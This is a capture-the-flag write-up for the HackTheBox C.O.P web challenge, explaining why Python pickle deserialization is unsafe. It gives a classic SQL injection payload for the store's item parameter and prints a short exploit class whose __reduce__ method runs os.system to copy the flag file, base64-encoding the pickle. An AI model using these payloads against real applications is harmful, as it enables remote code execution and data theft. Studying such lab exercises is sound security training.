We covered the python pickle library and explained why it’s not secure any more. Additionally we demonstrated to exploit a web application implementing the pickle library along with SQL injection. This was part of HackTheBox C.O.P web challenge.

Get OSCP Certificate Notes

The Complete Penetration Testing with BackBox Course


The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try and find a way into their operation!

Video Highlights

The vulnerable URL:


The paramter “1” can be replaced with a classic SQL payload such as ” OR “1”=”1

The challenge source code reveals that the web application uses python pickling to serialize and de-serialize data.

The pickle module implements binary protocols for serializing and de-serializing a Python object structure. _“Pickling”_ is the process whereby a Python object hierarchy is converted into a byte stream, and _“unpickling”_ is the inverse operation, whereby a byte stream (from a binary file or bytes-like object is converted back into an object hierarchy.

Python declared that pickle is not secure to unpickle because It is possible to construct malicious pickle data which will **execute arbitrary code during unpickling**. Never unpickle data that could have come from an untrusted source, or that could have been tampered with as python put it.Pickling and unpickling can be performed using `pickle.dumps` and `pickle.loads` respectivley.
Exploitation of `pickle` can be performed using `__reduce__` which enables us to get code execution in the pickled data.
Eventually the purpose of exploiting `pickle` is to create/modify a pickle to execute system commands on the target.

We used the below exploite code to solve the challenge.

import sys
import base64
import pickle
import urllib.parse
import requests
import os

payload = “cp flag.txt application/static/.”

class Exp:

def __reduce__(self):
return os.system, (payload,)

if __name__ == “__main__”:

payload = base64.b64encode(pickle.dumps(Exp())).decode()


Video Walkthrough

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.

View Articles